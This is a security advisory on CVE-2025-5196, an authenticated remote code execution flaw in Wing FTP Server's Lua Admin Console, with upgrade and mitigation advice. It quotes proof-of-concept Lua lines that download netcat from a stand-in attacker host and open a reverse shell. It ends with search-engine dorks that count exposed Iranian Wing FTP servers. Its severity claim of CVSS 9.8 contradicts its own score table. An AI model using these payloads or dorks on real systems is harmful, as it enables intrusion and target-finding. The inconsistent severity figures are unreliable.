Score	Severity	Version	Vector String
7.5	HIGH	4.0	CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
6.6	MEDIUM	3.1	CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H
6.6	MEDIUM	3.0	CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H
6.8	—	2.0	AV:N/AC:H/Au:M/C:C/I:C/A:C

Wing FTP Server (Lua Admin Console)

CVE-2025-5196 – Authenticated RCE via Lua Admin Console (Insufficient Sandboxing)

CVE ID: CVE-2025-5196
Severity: Critical (CVSS 9.8)
Affected Systems:

Wing FTP Server versions up to 7.4.3 (Windows, Linux, macOS)
Fixed in version 7.4.4

Tested On: Not specified

References:

Description

A critical vulnerability in Wing FTP Server allows an authenticated administrator to execute arbitrary Lua code via the Lua Admin Console due to insufficient sandboxing.

The flaw occurs in a trusted administrative interface (remote accessible) and can lead to remote code execution (RCE) with the privilege level of the Wing FTP service. This may result in full system compromise, data theft, lateral movement, or ransomware deployment.

Prerequisites

Valid administrator credentials for Wing FTP Server
Access to the web-based admin interface (Lua Admin Console)

Proof of Concept (PoC)

From the public GitHub repository:

os.execute('powershell -NoP -NonI -W Hidden -Exec Bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://ATTACKER/nc.exe\', \'C:\\Users\\Public\\nc.exe\')"')
os.execute('cmd /c powershell -NoP -W Hidden -Command "Start-Process \\\"C:\\Users\\Public\\nc.exe\\\" -ArgumentList \\\"192.168.1.100\\\",\\\"4443\\\",\\\"-e\\\",\\\"cmd.exe\\\""')

This PoC demonstrates how an attacker can spawn a reverse shell and fully compromise the underlying operating system.

Expected Result

The Lua Admin Console should execute code in a restricted sandbox environment.
Direct execution of OS-level commands must not be possible from within the Lua management interface.

Mitigation

Vendor Fix:
- The Wing FTP development team released version 7.4.4, which addresses CVE-2025-5196 by strengthening the sandbox of the Lua Admin Console.
- Download Wing FTP Server 7.4.4 (official site)
Upgrade Guidance:
- Windows:
  1. Back up your Wing FTP configuration and user data.
  2. Uninstall vulnerable versions (≤ 7.4.3).
  3. Install version 7.4.4 or later and restore configurations.
- Linux/macOS:
  1. Stop the Wing FTP service.
  2. Replace binaries with the 7.4.4 release build.
  3. Restart the service and verify with:
```
./wftpserver -v
```
Interim Mitigations (if patching is delayed):
- Restrict access to the admin console (IP whitelisting, firewall rules, VPN).
- Run Wing FTP service as a non-root / non-SYSTEM user.
- Monitor Lua console logs for suspicious use of os.execute.
- Disable or restrict Lua scripting in admin workflows.
Security Best Practices:
- Place the admin interface behind a reverse proxy or access gateway.
- Enforce multi-factor authentication (MFA) for admin accounts.
- Monitor logs for unusual reverse shells or abnormal process launches.

Disclaimer

This report and PoC are provided strictly for educational and research purposes. Do not exploit this vulnerability on production systems without explicit permission. The author assumes no responsibility for misuse or unintended consequences.

Versions	Product
affected at 7.4.0	FTP Server
affected at 7.4.1	FTP Server
affected at 7.4.2	FTP Server
affected at 7.4.3	FTP Server

تعداد در زمان نگارش گزارش	دورک	موتور جستجو
1210	site:.ir “Wing FTP Server”	Google
557	site:.ir “Wing FTP” “سرور”	Google
72	site:.ir “Wing FTP Server”	Bing

CVE-2025-5196